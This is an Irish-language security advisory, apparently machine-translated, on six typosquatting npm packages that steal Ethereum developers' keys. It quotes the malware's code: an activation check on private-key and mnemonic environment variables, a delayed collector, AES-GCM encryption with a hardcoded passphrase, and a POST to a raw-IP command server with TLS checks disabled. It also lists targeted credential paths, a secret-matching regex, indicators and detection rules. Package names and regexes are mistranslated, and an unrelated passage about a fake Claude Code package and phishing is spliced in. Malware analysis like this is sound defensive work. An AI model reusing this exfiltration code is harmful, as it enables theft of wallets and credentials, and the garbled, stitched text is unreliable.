Goideadh Eochracha Forbróra ag Ionsaí Typosquatting EVMDeFi npm

Goideadh Eochracha Forbróra ag Ionsaí Typosquatting EVM/DeFi npm

TL; DR

Ar an 6 Bealtaine 2026, foilsitheoir npm aonair, namikazesarada010206, bhrúigh sé phacáiste mailíseach a dhírigh ar éiceachóras forbróirí Ethereum, Solidity, agus DeFi.

Na pacáistí, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, agus web3-utils-core, d'úsáid siad ainmneacha inchreidte a bhí deartha le breathnú cosúil le leabharlanna cúnta le haghaidh uirlisí coitianta Web3.

Bhí an rud céanna sna sé phacáiste telemetry.js comhad. Bhí an comhad comhionann le beart ar fud an chnuasaigh, le SHA-256:

SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1

Ní ritheann an malware ag am suiteála. Níl aon preinstall or postinstall crúca. Ina áit sin, gníomhaíonn sé nuair a allmhairítear an pacáiste tríd require().

Tá tábhacht leis an mionsonra sin.

Fanann an t-ionchlannán go dtí go n-úsáideann forbróir an pacáiste i ndáiríre. Ansin seiceálann sé an bhfuil cuma fíor-thimpeallacht forbartha Ethereum / Solidity ar an stáisiún oibre. Lorgaíonn sé eochracha Alchemy nó Infura, eochracha príobháideacha, mnemonics, eochracha imscartha, nó eolaire áitiúil Foundry.

Má mheaitseálann an t-óstach, bailíonn an goideoir eochracha príobháideacha SSH, stórais eochracha sparán Foundry / Geth / Brownie, .env* comhaid, agus athróga timpeallachta íogaire. Criptíonn sé an pacáiste le AES-256-GCM ag baint úsáide as frása faire crua-chódaithe agus eis-scagthaíonn sé é chuig críochphointe IPv4 C2 amh le fíorú TLS díchumasaithe.

Dheimhnigh córas Rabhaidh Luath Malware (MEW) Xygeni go raibh na sé phacáiste mailíseach. Tá an pacáiste tuarascála bainte síos clárlainne npm ar feitheamh.

An Braisle: Sé Phacáiste, Foilsitheoir Amháin

Cuntas an fhoilsitheora namikazesarada010206 bhí nasctha leis an seoladh Gmail neamhfhíoraithe namikazesarada010206@gmail.com.

Foilsíodh an feachtas mar phléasc foilseacháin aon lae ar an 6 Bealtaine 2026. Rinneadh leaganacha de na sé phacáiste mar seo a leanas: 1.0.0, ní raibh aon spleáchais rith-ama aige, agus níor sheol sé ach trí chomhad:

package.json index.js telemetry.js

D’fhógair siad an stór foinse céanna freisin:

https://github.com/harunosakura030303-maker/evmchain-config

Gabhadh na chéad trí phacáiste ag scanóirí MEW ar an gcéad fhoilsiú. Cuireadh bratach fhoréigneach ar na trí cinn eile tar éis athbhreithniú anailísithe ar phróifíl npm an fhoilsitheora. Nuair a bhí an phróifíl chéanna comhionann le beart amháin. telemetry.js deimhníodh ar fud an chnuasaigh, dúnadh iad mar mailíseach de réir comhsheasmhachta.

Pacáiste Leagan npm Foilsithe Ticéad MEW Fíorasc
croí-viem 1.0.0 2026-05-06 01:38:44Z #51049 Mailíseacha
croí-viem-utils 1.0.0 2026-05-06 #51050 Mailíseacha
utils croí-chrua-hat 1.0.0 2026-05-06 #51051 Mailíseacha
evm-utils 1.0.0 2026-05-06 #51069 Mailíseach, de réir comhsheasmhachta
teilgcheárta-utils 1.0.0 2026-05-06 #51071 Mailíseach, de réir comhsheasmhachta
croí-utilí-web3 1.0.0 2026-05-06 #51070 Mailíseach, de réir comhsheasmhachta

Tá an straitéis ainmniúcháin simplí ach éifeachtach.

Ní dhéanann na pacáistí seo aithris ar ainmneacha cruinne suas an sruth. Ina áit sin, úsáideann siad iarmhíreanna “fóntais” inchreidte amhail -core, -utils, agus -utils-coreFágann sin go bhfuil cuma leabharlanna comhlacha orthu a mbeifeá ag súil le feiceáil gar d’uirlisí Web3.

Pacáiste Mailíseach Sprioc Dhlisteanach
croí-viem viem, cliant coitianta Ethereum TypeScript
croí-viem-utils viem
utils croí-chrua-hat hardhat, timpeallacht forbartha príomhshrutha Solidity
evm-utils Ainmspás uirlisí EVM cineálach
teilgcheárta-utils teilgcheárta, slabhra uirlisí Solidity
croí-utilí-web3 web3-utils, cúntóirí Web3.js

Seo patrún an “phacáiste forlíontaigh”: ní “Is mise an fíorphacáiste,” ach “Táim cosúil le cúntóir réasúnta timpeall an fhíorphacáiste.”

I gcás forbróirí DeFi atá ag bogadh go tapa, is leor sin chun riosca a chruthú.

Cad a Tharlaíonn Nuair a Allmhairítear an Pacáiste

Tá an slabhra ionsaithe beag, d'aon ghnó, agus dírithe ar thimpeallachtaí forbartha cripte.

Níl aon crúca suiteála ann. Ina áit sin, tá index.js a easpórtálann feidhmiúlacht stub agus ansin luchtóidh an modúl teileamaitreachta mailíseach.

require('./telemetry').init();

Ciallaíonn sé seo go ngníomhaíonn an malware ar an gcéad allmhairiú.

Tá sin úsáideach ó thaobh oibríochta de don ionsaitheoir. Díríonn go leor scanóirí agus boscaí gainimh ar iompar ag am suiteála. Fanann an pacáiste seo go dtí go n-úsáideann forbróir, script tógála, sraith tástála, nó cosán ama rithe é i ndáiríre.

Geata Gníomhachtaithe: Ní féidir é a úsáid ach ar Stáisiúin Oibre Forbróirí Web3 Fíor

Is é an geata gníomhachtaithe an chuid is tábhachtaí den ionchlannán.

Déanann an malware seiceáil ar athróga comhshaoil ​​a fhaightear go coitianta ar mheaisíní forbróirí Ethereum / Solidity:

const indicators = [   process.env.ALCHEMY_API_KEY,   process.env.INFURA_KEY,   process.env.PRIVATE_KEY,   process.env.MNEMONIC,   process.env.DEPLOYER_KEY, ].filter(Boolean);

Seiceálann sé freisin an bhfuil cuma air go bhfuil Foundry suiteáilte:

fs.existsSync(path.join(os.homedir(), '.foundry'))

Mura bhfuil ceachtar coinníoll fíor, filleann an fheidhm agus ní dhéanann sí tada.

Fágann sin go bhfuil an pacáiste níos ciúine i dtimpeallachtaí anailíse cineálacha. D’fhéadfadh bosca gainimh gan Foundry, eochracha Alchemy, eochracha Infura, eochracha príobháideacha, nó mnemonics a bheith ina allmhairiú atá neamhdhíobhálach.

Ar óstach meaitseála, fanann an malware 60 go 90 soicind sula mbailítear é:

setTimeout(() => { try { _collect(); } catch {} },           60000 + Math.random() * 30000).unref();

Laghdaíonn an mhoill an comhghaol soiléir idir allmhairiú agus eis-scagadh. .unref() Ligeann call don phróiseas óstach scoir de ghnáth freisin má allmhairíodh an pacáiste i script gearrshaolach.

Ní iompar torannach smash-and-grab é seo. Is goid spriocdhírithe é atá deartha chun gan rith mura bhfuil an timpeallacht forbróra fiúntach goid uaidh.

Cad a bhailíonn an Goideoir

Nuair a théann an geata gníomhachtaithe thart, bailíonn an malware ó na foinsí is tábhachtaí i bhforbairt Web3: eochracha príobháideacha, stórais eochracha sparán, dintiúir imscartha, rúin scamall, comharthaí npm, agus cumraíocht tionscadail áitiúil.

Foinse Cad a Bhailítear
próiseas.timpeallacht Aon athróg a mheaitseálann /TOKEN|SECRET|ECHALL|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i
~/.ssh/* Comhaid ina bhfuil PRIVATE EOCHAIR nó BEGIN OPENSSH, lena n-áirítear ábhar iomlán an chomhaid
~/.foundry/eochracha/* Comhaid stórais eochrach sparán Foundry
~/.ethereum/eochairstóras/* Comhaid stórais eochrach sparán Geth
~/.brownie/cuntais/* Comhaid stórais eochrach sparán Brownie
${cwd}/.env Ábhar iomlán an chomhaid
${cwd}/.crios.áitiúil Ábhar iomlán an chomhaid
${cwd}/.env.production Ábhar iomlán an chomhaid
${cwd}/.env.development Ábhar iomlán an chomhaid
os.hostname() Meiteashonraí óstach
cripte.randomUUID() Aitheantóir íospartaigh/seisiúin
Dáta.anois() Stampa ama bailiúcháin
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com

Is iad na comharthaí ATTA:

ATTA_ID 00400014144 ATTA_TOKEN 6478159937

Ní raibh muid in ann a dhearbhú an raibh an teileamaitríocht de chuid anailísíochta an oibreora féin nó cainéal monetaithe ar leithligh. Tá na comharthaí ATTA mar an gcéanna sa dá shampla a scrúdaíomar.

Braisle B: heibai

claude.hk Fioscaireacht OAuth + Fuadach URL ANTHROPIC_BASE

Is é sampla an 1 Aibreán an chuid is garbh agus is luaithe den fheachtas.

heibai:2.1.88-claude.hk-4 foilsithe ag wuguoqiangvip28, cuntas a cruthaíodh 7 Meitheamh, 2025. Rinne an pacáiste leagan soiléir de féin i gcoinne an dlí dhlisteanaigh 2.1.88 Scaoileadh antrapach.

Ní chuireann sé isteach ar MITM CA-cert. Ina áit sin, insíonn sé bréag don úsáideoir faoin gcríochphointe OAuth.

Áirítear ar na breiseanna mailíseacha anuas ar fhoinse sceite Claude Code:

Foinse Cad a Bhailítear
próiseas.timpeallacht Aon athróg a mheaitseálann /TOKEN|SECRET|ECHALL|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i
~/.ssh/* Comhaid ina bhfuil PRIVATE EOCHAIR nó BEGIN OPENSSH, lena n-áirítear ábhar iomlán an chomhaid
~/.foundry/eochracha/* Comhaid stórais eochrach sparán Foundry
~/.ethereum/eochairstóras/* Comhaid stórais eochrach sparán Geth
~/.brownie/cuntais/* Comhaid stórais eochrach sparán Brownie
${cwd}/.env Ábhar iomlán an chomhaid
${cwd}/.crios.áitiúil Ábhar iomlán an chomhaid
${cwd}/.env.production Ábhar iomlán an chomhaid
${cwd}/.env.development Ábhar iomlán an chomhaid
os.hostname() Meiteashonraí óstach
cripte.randomUUID() Aitheantóir íospartaigh/seisiúin
Dáta.anois() Stampa ama bailiúcháin

Tá an liosta sprice an-sonrach. Ní goid brabhsálaí cineálach ná scríobadh leathan dintiúir atá i gceist anseo. Tá sé dírithe ar fhorbróirí a thógann, a thástálann, a imscarann ​​nó a oibríonn feidhmchláir Ethereum.

Tá tábhacht ar leith ag baint le stórais eochracha Foundry, Geth, agus Brownie a áireamh. Is féidir leis na comhaid seo rochtain dhíreach ar sparán nó ar chéannachtaí imscartha a léiriú. Má tá an t-ionsaitheoir in ann iad a phéireáil le pasfhocail, mnemonics, nó rúin chomhshaoil, féadfaidh siad cistí a bhogadh, aithris a dhéanamh ar imscaradóirí, nó oibríochtaí conarthaí cliste a chur i mbaol.

Criptiú Roimh Eas-Scaipeadh

Criptíonn an malware na sonraí bailithe sula seoltar amach iad.

const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv);

Is é seo an frása faire crua-chódaithe:

a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d

Tá an t-ualach deiridh fillte mar JSON:

{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"}

Ní dhéanann criptiú an malware níos forbartha leis féin. Mar sin féin, déanann sé iniúchadh líonra níos deacra. D’fheicfeadh cosantóir a bheadh ​​ag faire ar imeacht ualach JSON, ach ní fheicfeadh sé na heochracha goidte, na comhaid sparán, ná... .env ábhar gan an frása faire crua-chódáilte agus an loighic dhíchriptithe.

Eas-scaipeadh chuig IPv4 C2 Amh

Tá an cosán eis-scagtha crua-chódaithe:

const req = https.request({   hostname: '76.13.37.80', port: 8443,   path: '/api/v1/telemetry', method: 'POST',   headers: { 'Content-Type': 'application/json', ... },   rejectUnauthorized: false, timeout: 8000, }, () => {});

Seolann an malware sonraí chuig:

https://76.13.37.80:8443/api/v1/telemetry

Seasann dhá shonra amach.

Ar dtús, is seoladh IPv4 lom é an C2 seachas fearann. Baintear an gá atá le clárú fearainn leis sin agus seachnaítear roinnt braite fearainn-bhunaithe.

Ar an dara dul síos, díchumasaítear fíorú TLS le:

rejectUnauthorized: false

Ligeann sé sin don bhogearraí mailíseacha glacadh le haon deimhniú, lena n-áirítear deimhnithe féinshínithe. Is é sin le rá, faigheann an t-ionsaitheoir iompar criptithe gan deimhniú poiblí bailí a bheith ag teastáil uaidh.

Níl aon loighic athiarrachta ná aon óstach cúltaca ann. Slogtar earráidí go ciúin. Coinníonn sé seo an pacáiste ciúin mura bhfuil an C2 as líne nó mura féidir teacht air.

Cén Fáth a bhfuil Tábhacht ag baint leis an bhFeachtas Seo

Bíonn formhór na bpacáistí npm mailíseacha atá dírithe ar fhorbróirí ag iarraidh dintiúir leathana a leanúint: comharthaí npm, eochracha AWS, comharthaí GitHub, nó .npmrc comhaid.

Cúngaíonn an feachtas seo an sprioc.

Lorgaíonn sé comharthaí gur le forbróir Ethereum nó Solidity an meaisín. Ansin tarraingíonn sé na sócmhainní atá tábhachtach sa timpeallacht sin go díreach: stórais eochracha sparán, eochracha príobháideacha, mnemonics, eochracha imscartha, .env comhaid, agus eochracha SSH.

Fágann sin go bhfuil an feachtas níos contúirtí do fhoirne Web3 ná goid npm cineálach.

D’fhéadfadh ionfhabhtú rathúil nochtadh a dhéanamh ar:

  • Sparán imscartha
  • Eochracha riarthóra conartha cliste
  • Eochracha soláthraí RPC
  • Dintiúir imscartha scamall
  • comharthaí foilsitheoireachta npm
  • Rochtain SSH ar bhonneagar forbróra nó tógála
  • Rúin tionscadail stóráilte i .env Comhaid
  • Stórais eochracha sparán le haghaidh Foundry, Geth, nó Brownie

Léiríonn ainmneacha na bpacáistí innealtóireacht shóisialta shoiléir freisin. Díríonn siad ar éiceachóras forbróirí Web3 trí ainmneacha uirlisí aitheanta: viem, hardhat, foundry, evm, agus web3.

Ní gá don aisteoir comhréiteach a dhéanamh maidir leis na tionscadail iarbhír. Ní theastaíonn uathu ach forbróir chun rud a shuiteáil a bhfuil cuma phacáiste réasúnta air.

Táscairí Comhréitigh agus Braite

Pacáistí agus Foilsitheoir
Réimse luach
foilsitheoir npm namikazesarada010206
Ríomhphost an fhoilsitheora namikazesarada010206@gmail.com
Ríomhphost fíoraithe Uimh
SCM fíoraithe Uimh
Scór clú 1.0
Pacáistí viem-core, viem-utils-core, hardhat-core-utils, evm-utils, teilgcheárta-utils, web3-utils-core
leaganacha Gach 1.0.0
Stór foinse https://github.com/harunosakura030303-maker/evmchain-config
Deimhnithe mailíseach Na sé phacáiste go léir
líonra
Cineál luach
Críochphointe C2 https://76.13.37.80:8443/api/v1/telemetry
C2 IP 76.13.37.80
Calafort C2 8443/tcp
Iompar TLS diúltaighGan Údarú: bréagach
Scéim ualaigh {"v":2,"iv": "d": "t": }
Comhaid agus Hashes
Cineál luach
teileamaitríocht.js SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1
Leagan amach an phacáiste pacáiste.json, innéacs.js, teileamaitríocht.js
Comhaireamh comhaid 3
Méid iomlán garbh 3.4 kB

Comharthaí Gníomhachtaithe

Déanann an malware seiceáil ar na hathróga comhshaoil ​​seo:

ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY

Seiceálann sé freisin le haghaidh:

~/.foundry/

Cosáin Óstacha Spriocdhírithe

~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development

Bailiúchán Regex

/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i

Nótaí Braite

Gabhann roinnt rialacha an feachtas seo gan anailís iompraíochta iomlán a bheith ag teastáil.

Ar dtús, scanadh comhaid ghlasála le haghaidh na sé ainm pacáiste mailíseacha:

viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core

Aon chluiche i package-lock.json, yarn.lock, pnpm-lock.yaml, Nó node_modules ba chóir stair a láimhseáil mar eachtra thromchúiseach.

Ar an dara dul síos, déan monatóireacht ar phróisis Node.js ag léamh cosáin stórais eochrach sparán:

~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/

Is annamh a bhíonn an iompar seo dlisteanach i gcás pacáiste a allmhairítear mar spleáchas cúnta. Bíonn sé thar a bheith amhrasach nuair a leanann gníomhaíocht líonra amach é.

Sa tríú háit, blocáil nó foláireamh a thabhairt ar naisc HTTPS chuig:

76.13.37.80:8443

Go háirithe nuair is é an cosán iarratais:

/api/v1/telemetry

Ceathrú, déan cuardach ar phacáistí npm a chomhcheanglaíonn na tréithe seo:

  • Foilsitheoir úr nó foilsitheoir ísealcháil
  • Cuntas Gmail neamhfhíoraithe
  • Ainm pacáiste atá cóngarach do Web3
  • Gan aon stair stórtha bríoch
  • Leagan amach pacáiste beag bídeach
  • index.js a luchtóidh comhad teileamaitreachta nó cúnta
  • Gan aon spleáchais rith-ama
  • Bailiúchán athróg timpeallachta íogair
  • Rochtain ar stór eochrach sparán

Tá an patrún seo níos úsáidí ná IOC aonair mar go bhféadfadh an chéad phacáiste eile an seoladh IP a athrú ach an loighic spriocdhírithe chéanna a choinneáil.

Liosta Seiceála Freagartha Comhréitigh

Má d'úsáid forbróir ceann de na sé phacáiste agus má chomhlíon a dtimpeallacht an geata gníomhachtaithe, measadh go raibh an stáisiún oibre i mbaol.

Áirítear leis sin meaisíní a bhfuil Foundry suiteáilte orthu, eochracha Alchemy nó Infura sa timpeallacht, eochracha príobháideacha, mnemonics, nó eochracha imscartha.

Freagra molta:

  • Dícheangail an t-óstach ón líonra.
  • Coinnigh node_modules, comhaid ghlasála, stair bhlaosc, agus logaí ábhartha le haghaidh fóiréinseach.
  • Rothlaigh gach péire eochracha SSH faoi ~/.ssh/.
  • Rothlaigh eochracha sparán do gach stór eochrach faoi ~/.foundry, ~/.ethereum, agus ~/.brownie.
  • Bog cistí chuig sparán úra.
  • Rothlaigh gach rún atá stóráilte i .env* comhaid i stórtha inar oibrigh an forbróir.
  • Rothlaigh rúin chomhshaoil ​​a mheaitseálann an regex bailiúcháin, lena n-áirítear eochracha AWS, comharthaí npm, comharthaí imscartha, eochracha API, eochracha príobháideacha, síolta, agus mnemonics.
  • Déan iniúchadh ar ghníomhaíocht scamall, npm, GitHub, soláthraí RPC, agus blockchain ó suiteáladh an pacáiste den chéad uair.
  • Ath-íomháigh an stáisiún oibre sula n-athúsáidtear é.

Cad ba Chóir do Chosantóirí a Thabhairt Leat

Léiríonn an feachtas seo an chaoi a bhfuil npm typosquatting ag teacht chun cinn timpeall ar éiceachórais forbróirí ardluacha.

Ní raibh gá le buanseasmhacht ón aisteoir. Ní raibh gá le doiléire. Ní raibh gá fiú le forghníomhú ag am suiteála.

Ina áit sin, bhí siad ag brath ar thrí rud:

  • Ainmneacha pacáiste Web3 inchreidte
  • Gníomhachtú ar mheaisíní cripte-fhorbartha fíor amháin
  • Goid dhíreach na gcomhad agus na rúin is tábhachtaí do fhorbróirí Ethereum

Fágann sin go bhfuil sé furasta an feachtas a chailleadh i scanadh leathan agus go bhfuil sé contúirteach nuair a thuirlingíonn sé sa timpeallacht cheart.

I gcás foirne Web3, tá an ceacht soiléir: déan ainmneacha spleáchais a chóireáil mar chuid de do mhúnla bagairtí. Is féidir le pacáiste a bhfuil cuma chúntóra neamhdhíobhálach air a bheith ina chonair is giorra fós chun an sparán a chur i mbaol.

Tuairiscíodh chuig an gclárlann npm é. Déanfaimid an post seo a nuashonrú nuair a bhainfear cuntas agus pacáistí an fhoilsitheora.

uirlisí-sca-uirlisí-bogearraí-anailíse-comhdhéanamh
Tabhair tosaíocht do rioscaí bogearraí, déan iad a leigheas agus a dhaingniú
Faigh do Chuntas Saor in Aisce.
Níl aon chárta creidmheasa ag teastáil.

Daingnigh do Fhorbairt agus do Sheachadadh Bogearraí

le Sraith Táirgí Xygeni